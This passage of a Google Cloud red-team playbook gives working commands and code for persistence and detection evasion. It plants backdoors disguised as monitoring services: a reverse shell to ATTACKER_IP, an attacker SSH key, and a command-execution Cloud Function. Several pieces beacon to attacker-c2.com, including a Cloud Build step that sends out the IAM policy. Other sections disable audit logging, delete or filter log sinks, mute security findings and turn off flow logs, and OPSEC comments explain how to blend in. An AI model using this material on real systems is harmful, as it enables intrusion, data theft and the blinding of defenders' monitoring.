# Service Account Impersonation Check
echo ""
echo "[+] Testing Service Account Impersonation:"
for sa in $(gcloud iam service-accounts list --format="value(email)" --project=$PROJECT_ID 2>/dev/null); do
    if gcloud iam service-accounts get-access-token $sa --project=$PROJECT_ID &>/dev/null; then
        echo "  [!] Can impersonate: $sa" | tee -a $OUTPUT_DIR/impersonatable-sas.txt
    fi
done

# Generate summary
cat > $OUTPUT_DIR/SUMMARY.txt << EOF
GCP Red Team Enumeration Summary
=================================
Project: $PROJECT_ID
Date: $(date)
Identity: $(gcloud config get-value account)

Resources Found:
- Service Accounts: $(wc -l < $OUTPUT_DIR/service-accounts.txt)
- Compute Instances: $(gcloud compute instances list --project=$PROJECT_ID --format="value(name)" | wc -l)
- Storage Buckets: $(gsutil ls -p $PROJECT_ID | wc -l)
- Cloud Functions: $(gcloud functions list --project=$PROJECT_ID --format="value(name)" | wc -l)
- GKE Clusters: $(gcloud container clusters list --project=$PROJECT_ID --format="value(name)" | wc -l)
- Secrets: $(gcloud secrets list --project=$PROJECT_ID --format="value(name)" | wc -l)

Key Findings:
$([ -f $OUTPUT_DIR/public-buckets.txt ] && echo "- Public buckets found" || echo "- No public buckets")
$([ -f $OUTPUT_DIR/impersonatable-sas.txt ] && echo "- Impersonatable service accounts found" || echo "- No impersonatable SAs")
$([ -f $OUTPUT_DIR/privileged-sas.txt ] && echo "- High-privilege service accounts identified")

Next Steps:
1. Review privileged-sas.txt for escalation opportunities
2. Check public-buckets.txt for sensitive data exposure
3. Test impersonatable-sas.txt for privilege escalation
4. Review firewall-permissive.txt for network access
5. Enumerate secrets.txt for credential access
EOF

echo ""
echo "[*] Enumeration Complete!"
echo "[*] Results saved to: $OUTPUT_DIR"
cat $OUTPUT_DIR/SUMMARY.txt

Make executable and run:


chmod +x gcp-enum.sh
./gcp-enum.sh my-project-id

GCP Security Tools Comparison (2024-2025):

Tool                Focus                  Output    Stealth     Best For
GCP-IAM-Priv-Esc    Privilege escalation   Text      Medium      Finding escalation paths
CloudFox            Attack paths           Markdown  High        Comprehensive recon
ScoutSuite          Security audit         HTML      Low         Compliance assessment
GCPBucketBrute      Storage enum           Text      Very High   External recon (unauthenticated)
Custom scripts      Flexible               Various   Medium      Targeted enumeration

Persistence Mechanisms

1. Service Account with Long-Lived Key:

# Create inconspicuous service account
gcloud iam service-accounts create backup-automation \
    --display-name="Backup Automation Service" \
    --description="Automated backup and recovery service" \
    --project=PROJECT_ID

# Grant privileges
gcloud projects add-iam-policy-binding PROJECT_ID \
    --member="serviceAccount:backup-automation@PROJECT_ID.iam.gserviceaccount.com" \
    --role="roles/editor"

# Create key (never expires unless deleted)
gcloud iam service-accounts keys create backup-sa-key.json \
    --iam-account=backup-automation@PROJECT_ID.iam.gserviceaccount.com \
    --project=PROJECT_ID

# Store key in secure location
# Option 1: Cloud Storage (looks legitimate)
gsutil cp backup-sa-key.json gs://ATTACKER_BUCKET/keys/backup-sa.json

# Option 2: Secret Manager (more stealthy)
gcloud secrets create backup-service-key \
    --replication-policy=automatic \
    --data-file=backup-sa-key.json \
    --project=PROJECT_ID

# Test authentication
gcloud auth activate-service-account --key-file=backup-sa-key.json
gcloud projects list

# OPSEC: Service accounts are expected in production
# Keys never expire (persistent access)
# Name service accounts after legitimate services
# Store keys in Cloud Storage or Secret Manager (appears operational)

2. Compute Engine Startup Script Backdoor:

# Create backdoor startup script
cat > startup-backdoor.sh << 'EOF'
#!/bin/bash
# System initialization and monitoring

# Add SSH key for backdoor access
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQ... attacker@kali" >> /home/user/.ssh/authorized_keys

# Install reverse shell as systemd service
cat > /etc/systemd/system/gcp-monitor.service << 'SERVICE'
[Unit]
Description=GCP Monitoring Agent
After=network.target

[Service]
Type=simple
ExecStart=/bin/bash -c 'while true; do bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1; sleep 300; done'
Restart=always
RestartSec=30

[Install]
WantedBy=multi-user.target
SERVICE

systemctl daemon-reload
systemctl enable gcp-monitor.service
systemctl start gcp-monitor.service

# Beacon to C2
curl -X POST https://attacker-c2.com/beacon \
    -H "Content-Type: application/json" \
    -d "{\"hostname\":\"$(hostname)\",\"time\":\"$(date)\"}"
EOF

# Upload to Cloud Storage
gsutil cp startup-backdoor.sh gs://BUCKET_NAME/scripts/startup.sh

# Create VM with backdoor startup script
gcloud compute instances create backdoor-vm \
    --machine-type=e2-micro \
    --zone=us-central1-a \
    --metadata-from-file=startup-script=startup-backdoor.sh \
    --service-account=PRIVILEGED_SA@PROJECT_ID.iam.gserviceaccount.com \
    --scopes=cloud-platform \
    --tags=http-server \
    --project=PROJECT_ID

# Or add to existing VM
gcloud compute instances add-metadata EXISTING_VM \
    --zone=us-central1-a \
    --metadata-from-file=startup-script=startup-backdoor.sh \
    --project=PROJECT_ID

# For project-wide metadata (affects all new VMs)
gcloud compute project-info add-metadata \
    --metadata-from-file=startup-script=startup-backdoor.sh \
    --project=PROJECT_ID

# OPSEC: Startup scripts execute with root privileges
# Only run on instance start/restart (may need to wait)
# Store scripts in Cloud Storage (appears as infrastructure code)
# Use benign script names and service descriptions

3. Cloud Function Backdoor (Serverless):

# Create Cloud Function with command execution
cat > main.py << 'EOF'
import functions_framework
import subprocess
import json
import os

# Authentication token (store in environment variable)
AUTH_TOKEN = os.environ.get('AUTH_TOKEN', 'default-secret')

@functions_framework.http
def backdoor(request):
    request_json = request.get_json(silent=True)
    
    # Authenticate
    if not request_json or request_json.get('token') != AUTH_TOKEN:
        return ('Unauthorized', 403)
    
    # Execute command
    cmd = request_json.get('cmd', 'echo "No command provided"')
    try:
        result = subprocess.run(
            cmd,
            shell=True,
            capture_output=True,
            text=True,
            timeout=55  # Cloud Functions have 60s timeout
        )
        return json.dumps({
            'stdout': result.stdout,
            'stderr': result.stderr,
            'returncode': result.returncode
        })
    except Exception as e:
        return json.dumps({'error': str(e)}), 500
EOF

cat > requirements.txt << 'EOF'
functions-framework==3.*
EOF

# Deploy function
gcloud functions deploy system-health-check \
    --runtime=python311 \
    --trigger-http \
    --allow-unauthenticated \
    --service-account=PRIVILEGED_SA@PROJECT_ID.iam.gserviceaccount.com \
    --set-env-vars=AUTH_TOKEN=YOUR_SECRET_TOKEN \
    --region=us-central1 \
    --project=PROJECT_ID

# Get function URL
FUNCTION_URL=$(gcloud functions describe system-health-check \
    --region=us-central1 \
    --format="value(httpsTrigger.url)" \
    --project=PROJECT_ID)

echo "Function URL: $FUNCTION_URL"

# Test backdoor
curl -X POST $FUNCTION_URL \
    -H "Content-Type: application/json" \
    -d '{"token":"YOUR_SECRET_TOKEN","cmd":"gcloud projects list"}'

# OPSEC: Cloud Functions are common for webhooks and APIs
# Unauthenticated functions are sometimes necessary (but risky)
# Use generic names: "webhook-handler", "api-proxy", "health-check"
# Store auth token in environment variables (not in code)

4. Cloud Scheduler Job (Periodic Beacon):

# Create Cloud Scheduler job that calls Cloud Function periodically
gcloud scheduler jobs create http beacon-job \
    --schedule="0 */6 * * *" \
    --uri="$FUNCTION_URL" \
    --http-method=POST \
    --headers="Content-Type=application/json" \
    --message-body='{"token":"YOUR_SECRET_TOKEN","cmd":"gcloud compute instances list"}' \
    --location=us-central1 \
    --project=PROJECT_ID

# Or create job that hits external C2
gcloud scheduler jobs create http c2-beacon \
    --schedule="0 */6 * * *" \
    --uri="https://attacker-c2.com/beacon" \
    --http-method=POST \
    --headers="Content-Type=application/json,X-Auth=SECRET" \
    --message-body='{"project":"PROJECT_ID","time":"{{.NOW}}"}' \
    --location=us-central1 \
    --project=PROJECT_ID

# List scheduled jobs
gcloud scheduler jobs list --location=us-central1 --project=PROJECT_ID

# OPSEC: Scheduled jobs are common for automation
# Runs every 6 hours (adjust to blend with normal activity)
# External HTTPS calls are common (webhooks, monitoring)

5. Secret Manager Credential Storage:

# Store backdoor credentials in Secret Manager
cat > backdoor-creds.json << EOF
{
  "service_account_key": "$(cat backup-sa-key.json | base64)",
  "ssh_private_key": "$(cat ~/.ssh/id_rsa | base64)",
  "c2_url": "https://attacker-c2.com",
  "auth_token": "YOUR_SECRET_TOKEN"
}
EOF

# Create secret
gcloud secrets create operational-credentials \
    --replication-policy=automatic \
    --data-file=backdoor-creds.json \
    --project=PROJECT_ID

# Grant access to service account
gcloud secrets add-iam-policy-binding operational-credentials \
    --member="serviceAccount:backup-automation@PROJECT_ID.iam.gserviceaccount.com" \
    --role="roles/secretmanager.secretAccessor" \
    --project=PROJECT_ID

# Retrieve later
gcloud secrets versions access latest \
    --secret=operational-credentials \
    --project=PROJECT_ID

# OPSEC: Secret Manager is designed for credential storage
# Secrets named appropriately blend in
# Access is logged but expected for automation
# Use business-appropriate names: "api-credentials", "database-password"

6. Cloud Build Trigger Backdoor:

# Cloud Build can execute arbitrary code on GCP infrastructure
# Create cloudbuild.yaml with backdoor

cat > cloudbuild.yaml << 'EOF'
steps:
  - name: 'gcr.io/cloud-builders/gcloud'
    entrypoint: 'bash'
    args:
      - '-c'
      - |
        # Beacon to C2
        curl -X POST https://attacker-c2.com/build-beacon \
          -H "Content-Type: application/json" \
          -d "{\"project\":\"$PROJECT_ID\",\"build\":\"$BUILD_ID\"}"
        
        # Execute arbitrary commands
        gcloud compute instances list
        gcloud iam service-accounts list
        
        # Exfiltrate data
        gcloud projects get-iam-policy $PROJECT_ID | \
          curl -X POST https://attacker-c2.com/data -d @-

timeout: 600s
EOF

# Upload to Cloud Storage
gsutil cp cloudbuild.yaml gs://BUCKET_NAME/cloudbuild.yaml

# Create build trigger
gcloud builds triggers create manual \
    --name="system-maintenance-build" \
    --build-config=gs://BUCKET_NAME/cloudbuild.yaml \
    --service-account=projects/PROJECT_ID/serviceAccounts/PRIVILEGED_SA@PROJECT_ID.iam.gserviceaccount.com \
    --project=PROJECT_ID

# Trigger build manually
gcloud builds triggers run system-maintenance-build \
    --branch=main \
    --project=PROJECT_ID

# Or create GitHub-triggered build (if repo connected)
gcloud builds triggers create github \
    --name="github-maintenance-trigger" \
    --repo-name=REPO_NAME \
    --repo-owner=OWNER \
    --branch-pattern="^main$" \
    --build-config=cloudbuild.yaml \
    --service-account=projects/PROJECT_ID/serviceAccounts/PRIVILEGED_SA@PROJECT_ID.iam.gserviceaccount.com \
    --project=PROJECT_ID

# OPSEC: Cloud Build is common for CI/CD
# Builds run with service account permissions
# Arbitrary code execution in GCP environment
# Logs show build execution but not detailed commands

7. GKE Workload Backdoor:

# Deploy backdoor container to GKE cluster
# First, get cluster credentials
gcloud container clusters get-credentials CLUSTER_NAME \
    --zone=us-central1-a \
    --project=PROJECT_ID

# Create deployment with backdoor
cat > backdoor-deployment.yaml << 'EOF'
apiVersion: apps/v1
kind: Deployment
metadata:
  name: monitoring-agent
  namespace: kube-system
spec:
  replicas: 1
  selector:
    matchLabels:
      app: monitoring
  template:
    metadata:
      labels:
        app: monitoring
    spec:
      serviceAccountName: default
      containers:
      - name: agent
        image: alpine:latest
        command: ["/bin/sh"]
        args:
          - -c
          - |
            apk add --no-cache curl bash
            while true; do
              curl -X POST https://attacker-c2.com/k8s-beacon \
                -H "Content-Type: application/json" \
                -d "{\"cluster\":\"$CLUSTER_NAME\",\"pod\":\"$HOSTNAME\"}"
              sleep 3600
            done
EOF

# Deploy
kubectl apply -f backdoor-deployment.yaml

# Or create CronJob for periodic execution
cat > backdoor-cronjob.yaml << 'EOF'
apiVersion: batch/v1
kind: CronJob
metadata:
  name: system-cleanup
  namespace: kube-system
spec:
  schedule: "0 */6 * * *"
  jobTemplate:
    spec:
      template:
        spec:
          serviceAccountName: default
          containers:
          - name: cleanup
            image: google/cloud-sdk:alpine
            command:
            - /bin/sh
            - -c
            - |
              gcloud compute instances list
              curl -X POST https://attacker-c2.com/k8s-job
          restartPolicy: OnFailure
EOF

kubectl apply -f backdoor-cronjob.yaml

# OPSEC: Pods in kube-system namespace appear operational
# Workload Identity provides GCP API access
# CronJobs are common for maintenance tasks
# Use monitoring-themed names

8. IAM Policy Binding with Condition (Stealthy):

# Add IAM binding that only activates under specific conditions
# Makes backdoor less obvious in policy audits

# Create conditional binding (time-based)
gcloud projects add-iam-policy-binding PROJECT_ID \
    --member="serviceAccount:backdoor-sa@PROJECT_ID.iam.gserviceaccount.com" \
    --role="roles/owner" \
    --condition='expression=request.time > timestamp("2024-01-01T00:00:00Z"),title=TemporaryAccess,description=Temporary elevated access'

# Or attribute-based condition (IP/header-based)
# NOTE: only certain attributes are available to IAM Conditions; header-style attributes
# are evaluated only by services that support them, so this may be rejected on a plain
# project binding (request.time and resource.* are the broadly supported attributes)
gcloud projects add-iam-policy-binding PROJECT_ID \
    --member="user:attacker@gmail.com" \
    --role="roles/editor" \
    --condition='expression=request.headers["x-forwarded-for"].startsWith("10.0.0."),title=InternalAccess,description=Internal network access only'

# Complex condition (day of week)
gcloud projects add-iam-policy-binding PROJECT_ID \
    --member="serviceAccount:maintenance-sa@PROJECT_ID.iam.gserviceaccount.com" \
    --role="roles/owner" \
    --condition='expression=request.time.getDayOfWeek("America/New_York") == 0,title=WeekendMaintenance,description=Weekend maintenance window'

# OPSEC: Conditional bindings are less obvious in policy reviews
# Conditions can hide escalation behind specific triggers
# Time-based conditions activate only when needed
# Complex expressions may be overlooked in audits

GCP - Detection Evasion

Detection Evasion Techniques

1. Cloud Audit Logs Analysis & Evasion:

# GCP has three types of audit logs:
# - Admin Activity (always enabled, 400 days retention)
# - Data Access (must be enabled, configurable retention)
# - System Event (always enabled, 400 days retention)

# Check audit log configuration
gcloud logging sinks list --project=PROJECT_ID

# View recent admin activities
gcloud logging read "logName=projects/PROJECT_ID/logs/cloudaudit.googleapis.com%2Factivity" \
    --limit=50 \
    --project=PROJECT_ID

# View data access logs (if enabled)
gcloud logging read "logName=projects/PROJECT_ID/logs/cloudaudit.googleapis.com%2Fdata_access" \
    --limit=50 \
    --project=PROJECT_ID

# CRITICAL: GCP audit logs are immutable
# Cannot be deleted or modified (stored in Google infrastructure)
# Unlike AWS, there's no S3 bucket to manipulate

# EVASION STRATEGIES:

# Strategy 1: Disable Data Access logging (if you have permissions)
# Admin Activity logs CANNOT be disabled
# Data Access audit settings live in the IAM policy's auditConfigs block; to turn them off,
# pull the full policy, strip the DATA_READ/DATA_WRITE auditLogConfigs (or add your identity
# to exemptedMembers), then push the policy back
gcloud projects get-iam-policy PROJECT_ID --format=json > policy.json
# ...edit policy.json: remove/trim the auditConfigs entries, keep the etag...
gcloud projects set-iam-policy PROJECT_ID policy.json

# Org-wide Data Access logging is configured the same way at the organization level
# (requires organization-level permissions - rare)
gcloud organizations get-iam-policy ORGANIZATION_ID --format=json > org-policy.json
gcloud organizations set-iam-policy ORGANIZATION_ID org-policy.json

# Strategy 2: Delete log sinks (prevents export to external systems)
gcloud logging sinks delete SINK_NAME --project=PROJECT_ID

# Strategy 3: Modify log sink filters (reduce visibility)
gcloud logging sinks update SINK_NAME \
    --log-filter='severity >= ERROR' \
    --project=PROJECT_ID

# This only logs errors, hiding INFO-level activities

# Strategy 4: Work within unlogged operations
# Some operations generate minimal or no audit logs:
# - Metadata service access (no logs)
# - Read-only operations (only logged if Data Access enabled)
# - Service account token generation via metadata (no logs)

# OPSEC: Focus on read operations if Data Access logging disabled
# Admin Activity logs are comprehensive and permanent
# Better to blend in than try to erase tracks
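
# Quick check (sketch, assumes jq): confirm whether Data Access logging is enabled before
# relying on "read-only is unlogged" - project audit configs live in the IAM policy
gcloud projects get-iam-policy PROJECT_ID --format=json | jq '.auditConfigs'
# null/empty output => no project-level Data Access logging (org-level configs may still apply)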

2. Log Sink and Export Manipulation:

# Check where logs are being exported
gcloud logging sinks list --project=PROJECT_ID

# Get sink details
gcloud logging sinks describe SINK_NAME --project=PROJECT_ID

# Common export destinations:
# - Cloud Storage buckets
# - BigQuery datasets
# - Pub/Sub topics
# - Log Analytics (via log bucket)

# EVASION: Modify sink to exclude your activities
gcloud logging sinks update SINK_NAME \
    --log-filter='protoPayload.authenticationInfo.principalEmail!="attacker@gmail.com"' \
    --project=PROJECT_ID

# Or exclude specific service account
gcloud logging sinks update SINK_NAME \
    --log-filter='protoPayload.authenticationInfo.principalEmail!="backdoor-sa@PROJECT_ID.iam.gserviceaccount.com"' \
    --project=PROJECT_ID

# DESTRUCTIVE: Delete log sink entirely
gcloud logging sinks delete SINK_NAME --project=PROJECT_ID

# Check if logs go to BigQuery
bq ls --project_id=PROJECT_ID

# If logs in BigQuery, you might be able to delete them (if you have permissions)
bq rm -f -t PROJECT_ID:DATASET.TABLE

# OPSEC: Sink modifications are logged in Admin Activity
# Deleting sinks prevents SIEM/external analysis
# Only removes export, doesn't affect Cloud Logging retention

3. Security Command Center Evasion:

# Security Command Center (SCC) aggregates security findings
# Available in Standard (free) and Premium tiers

# Check if SCC is enabled
gcloud scc sources list --organization=ORGANIZATION_ID

# View findings
gcloud scc findings list --organization=ORGANIZATION_ID

# Get specific finding
gcloud scc findings describe FINDING_ID \
    --organization=ORGANIZATION_ID \
    --source=SOURCE_ID

# EVASION STRATEGIES:

# Strategy 1: Mute findings (requires securitycenter.findings.setMute / update permissions)
# (exact gcloud syntax varies by SDK version; muting can also be done via the SCC console/API)
gcloud scc findings set-mute FINDING_ID \
    --organization=ORGANIZATION_ID \
    --source=SOURCE_ID \
    --mute=MUTED

# Strategy 2: Create mute configurations (auto-mute specific findings)
gcloud scc muteconfigs create auto-mute-config \
    --organization=ORGANIZATION_ID \
    --description="Mute specific finding types" \
    --filter='category="SUSPICIOUS_ACTIVITY" AND resourceName=~"backdoor"'

# Strategy 3: Disable specific detectors (Premium tier only)
# Requires organization-level access
# Not directly possible via gcloud, must use Console or API

# OPSEC: SCC findings are generated by Google's threat detection
# Muting findings is heavily logged
# Better to avoid triggering detections in first place
# Work slowly, use legitimate-looking resources

4. Event Threat Detection Evasion:

# Event Threat Detection (ETD) identifies suspicious patterns
# Part of SCC Premium

# Common ETD findings:
# - Unusual API calls
# - Privilege escalation attempts
# - Data exfiltration patterns
# - Malware execution
# - Brute force attacks

# EVASION STRATEGIES:

# Strategy 1: Operate during business hours
# Behavioral analytics flag off-hours activity
CURRENT_HOUR=$(date +%H)
if [ $CURRENT_HOUR -lt 8 ] || [ $CURRENT_HOUR -gt 18 ]; then
    echo "Outside business hours - waiting"
    sleep 3600
    exit
fi

# Strategy 2: Rate limiting (avoid bulk operations)
for resource in $(gcloud compute instances list --format="value(name)"); do
    echo "Processing: $resource"
    # Perform action
    sleep $(( RANDOM % 10 + 5 ))  # Random delay 5-15 seconds
done

# Strategy 3: Use service accounts (less behavioral profiling)
# Human users have behavioral patterns
# Service accounts expected to be consistent/automated

# Strategy 4: Geographic consistency
# Authenticate from same region/IP consistently
# Avoid impossible travel scenarios

# Strategy 5: Blend with normal operations
# Mimic patterns of legitimate automation
# Use common tools (gcloud, terraform) vs custom scripts

# OPSEC: ETD uses machine learning on audit logs
# Patterns matter more than individual actions
# Consistency and predictability avoid anomaly detection

5. VPC Flow Logs Evasion:

# Check if VPC Flow Logs enabled
gcloud compute networks subnets describe SUBNET_NAME \
    --region=REGION \
    --format="value(enableFlowLogs)" \
    --project=PROJECT_ID

# List all subnets with flow logs
gcloud compute networks subnets list \
    --filter="enableFlowLogs=true" \
    --project=PROJECT_ID

# EVASION STRATEGIES:

# Strategy 1: Disable flow logs (if you have permissions)
gcloud compute networks subnets update SUBNET_NAME \
    --region=REGION \
    --no-enable-flow-logs \
    --project=PROJECT_ID

# Strategy 2: Use Private Google Access
# Traffic to Google APIs stays on Google network
# Less visibility than internet egress

# Enable Private Google Access
gcloud compute networks subnets update SUBNET_NAME \
    --region=REGION \
    --enable-private-ip-google-access \
    --project=PROJECT_ID

# Strategy 3: Use Private Service Connect
# Endpoints for Google services within VPC
# Traffic doesn't traverse internet

# Strategy 4: Encrypted tunnels (VPN/SSH)
# Flow logs show encrypted traffic, not contents
# Use SSH tunneling for C2 communication

# OPSEC: Flow logs show src/dst IP, port, protocol
# Encryption prevents deep inspection
# Private Google Access is common pattern (low suspicion)

6. Rate Limiting and Quota Evasion:

# GCP enforces API quotas per project/user
# Different quotas for different APIs

# Check quotas
gcloud compute project-info describe \
    --project=PROJECT_ID \
    --format="value(quotas)"

# View quota usage
gcloud compute regions describe REGION \
    --project=PROJECT_ID \
    --format="value(quotas)"

# EVASION STRATEGIES:

# Strategy 1: Distribute across multiple projects
for project in PROJECT1 PROJECT2 PROJECT3; do
    gcloud compute instances list --project=$project
    sleep 2
done

# Strategy 2: Use multiple service accounts
# Each SA has separate quota allocation
for sa_key in sa1.json sa2.json sa3.json; do
    gcloud auth activate-service-account --key-file=$sa_key
    gcloud compute instances list
    sleep 3
done

# Strategy 3: Distribute across regions
for region in us-central1 us-east1 europe-west1; do
    gcloud compute instances list --filter="zone:$region*"
    sleep 2
done

# Strategy 4: Exponential backoff on rate limit errors
attempt=0
max_attempts=5
while [ $attempt -lt $max_attempts ]; do
    if gcloud compute instances list 2>/dev/null; then
        break
    else
        sleep $(( 2 ** attempt ))
        ((attempt++))
    fi
done

# Strategy 5: Use batch APIs when available
# Single API call for multiple operations
# Example: batchGet instead of multiple get calls

# OPSEC: Rate limit errors (429) are logged
# Hitting quotas frequently indicates suspicious activity
# Slow, distributed operations stay under radar

7. Cloud Asset Inventory Evasion:

# Cloud Asset Inventory provides visibility into resources
# Organizations may use it for security monitoring

# Check if Asset Inventory is enabled
gcloud asset search-all-resources \
    --scope=projects/PROJECT_ID \
    --asset-types="compute.googleapis.com/Instance" \
    --project=PROJECT_ID 2>&1

# EVASION STRATEGIES:

# Strategy 1: Use ephemeral resources
# Short-lived resources may not be captured
gcloud compute instances create temp-vm \
    --machine-type=e2-micro \
    --zone=us-central1-a \
    --project=PROJECT_ID

# Use the VM
# ...

# Delete immediately
gcloud compute instances delete temp-vm \
    --zone=us-central1-a \
    --quiet \
    --project=PROJECT_ID

# Strategy 2: Use resources in less-monitored projects
# Focus on dev/test projects vs production

# Strategy 3: Leverage existing resources
# Modify existing VMs instead of creating new ones
# Less likely to trigger new resource alerts

# OPSEC: Asset Inventory snapshots at intervals
# Ephemeral resources (< 1 hour) may be missed
# Modifications to existing resources less visible than new resources

8. Organization Policy Bypass:

# Organization Policies enforce constraints
# Example: Restrict VM external IPs, require OS Login

# Check active policies
gcloud resource-manager org-policies list \
    --project=PROJECT_ID

# Get specific policy
gcloud resource-manager org-policies describe \
    compute.vmExternalIpAccess \
    --project=PROJECT_ID

# EVASION STRATEGIES:

# Strategy 1: Find policy exemptions
# Policies often have exceptions for specific projects/resources
# Look for dev/test projects with relaxed policies

# Strategy 2: Use compliant methods
# If external IPs restricted, use Cloud NAT or IAP tunneling
gcloud compute ssh INSTANCE_NAME \
    --zone=us-central1-a \
    --tunnel-through-iap \
    --project=PROJECT_ID

# Strategy 3: Work within policy constraints
# If OS Login required, use it (don't try to bypass)
# Compliance with policies reduces suspicion

# OPSEC: Policy violations generate alerts
# Working within constraints is stealthier
# Find legitimate workarounds vs direct bypass

9. API Key vs OAuth Token Strategy:

# GCP supports both API keys and OAuth tokens
# API keys are simpler but less secure

# Create API key (if needed for specific APIs)
gcloud services api-keys create \
    --display-name="Backup Integration Key" \
    --project=PROJECT_ID

# EVASION CONSIDERATIONS:

# OAuth tokens (preferred):
# - Short-lived (1 hour default)
# - Tied to identity (user/service account)
# - More logging

# API keys:
# - Long-lived (until revoked)
# - Less granular logging
# - Simpler to use/share

# For stealth: Use OAuth tokens via metadata service
# No key management, automatic rotation, less attribution
TOKEN=$(curl -s -H "Metadata-Flavor: Google" \
    "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" | \
    jq -r '.access_token')

# OPSEC: Metadata service tokens don't require key files
# Token generation not logged (unlike key creation)
# Automatic rotation (1 hour) prevents long-term key compromise

10. Cross-Project Resource Access:

# GCP allows cross-project resource access
# Can obscure activity across project boundaries

# Access resource in different project (if you have permissions)
gcloud compute instances list --project=OTHER_PROJECT_ID

# Use service account from one project in another
gcloud compute instances create vm-in-project2 \
    --project=PROJECT2_ID \
    --service-account=sa@PROJECT1_ID.iam.gserviceaccount.com \
    --scopes=cloud-platform

# Access storage bucket from different project
gsutil ls gs://bucket-in-other-project

# EVASION STRATEGIES:

# Strategy 1: Spread operations across projects
# Harder to correlate activities
# Different security teams may monitor different projects

# Strategy 2: Use shared VPCs
# Network traffic between projects appears internal
# Less visibility than internet-routed traffic

# Strategy 3: Cross-project service account usage
# Service account from PROJECT_A acts on PROJECT_B
# Audit logs in PROJECT_B show PROJECT_A service account

# OPSEC: Cross-project access is common in enterprises
# Appears as legitimate resource sharing
# Requires proper IAM configuration (not always present)

11. Workload Identity and Service Account Token Strategy:

# Workload Identity (GKE) provides automatic token generation
# No service account keys needed

# From GKE pod with Workload Identity:
# Token automatically injected via metadata service
# No explicit authentication needed

# EVASION ADVANTAGES:

# 1. No key management (no key creation logs)
# 2. Automatic token rotation (harder to track)
# 3. Pod-level attribution (not user-level)
# 4. Common pattern in modern GKE (low suspicion)

# Check Workload Identity configuration
gcloud container clusters describe CLUSTER_NAME \
    --zone=us-central1-a \
    --format="value(workloadIdentityConfig)" \
    --project=PROJECT_ID

# Bind Kubernetes SA to GCP SA
gcloud iam service-accounts add-iam-policy-binding \
    TARGET_SA@PROJECT_ID.iam.gserviceaccount.com \
    --role roles/iam.workloadIdentityUser \
    --member "serviceAccount:PROJECT_ID.svc.id.goog[NAMESPACE/KSA_NAME]" \
    --project=PROJECT_ID
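
# Then annotate the Kubernetes SA so pods using it receive tokens for the GCP SA
# (sketch; NAMESPACE and KSA_NAME are placeholders)
kubectl annotate serviceaccount KSA_NAME \
    --namespace NAMESPACE \
    iam.gke.io/gcp-service-account=TARGET_SA@PROJECT_ID.iam.gserviceaccount.com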

# From pod, tokens are automatically available
kubectl run test-pod --image=google/cloud-sdk:alpine --rm -it -- bash
# Inside pod:
gcloud auth list  # Shows Workload Identity SA

# OPSEC: Workload Identity is recommended practice
# No secret files in containers
# Token requests through metadata service (not logged)

12. Time-Based and Behavioral Evasion:

# Advanced evasion using timing and behavior patterns

# Script: Operate only during business hours
cat > time-aware-enum.sh << 'EOF'
#!/bin/bash

# Check if current time is business hours (8 AM - 6 PM, Mon-Fri)
HOUR=$(date +%H)
DAY=$(date +%u)  # 1=Monday, 7=Sunday

if [ $DAY -ge 6 ]; then
    echo "Weekend - skipping"
    exit 0
fi

if [ $HOUR -lt 8 ] || [ $HOUR -gt 18 ]; then
    echo "Outside business hours - skipping"
    exit 0
fi

# Proceed with operations
echo "Business hours confirmed - proceeding"
gcloud compute instances list

# Add random delays to mimic human behavior
sleep $(( RANDOM % 60 + 30 ))  # 30-90 seconds

# Continue operations...
EOF

# Script: Rate-limited enumeration
cat > rate-limited-enum.sh << 'EOF'
#!/bin/bash

# List resources with delays
for project in $(gcloud projects list --format="value(projectId)"); do
    echo "Enumerating project: $project"
    gcloud compute instances list --project=$project --limit=10
    
    # Random delay 5-15 seconds
    sleep $(( RANDOM % 10 + 5 ))
    
    # Check if off-hours, pause until business hours
    HOUR=$(date +%H)
    if [ $HOUR -lt 8 ] || [ $HOUR -gt 18 ]; then
        echo "Off-hours detected - pausing until 8 AM"
        # Calculate seconds until 8 AM next day
        # (simplified - full implementation would be more complex)
        sleep 3600
    fi
done
EOF

# OPSEC: Time-aware operations avoid anomaly detection
# Random delays prevent pattern recognition
# Mimicking human behavior reduces ML detection likelihood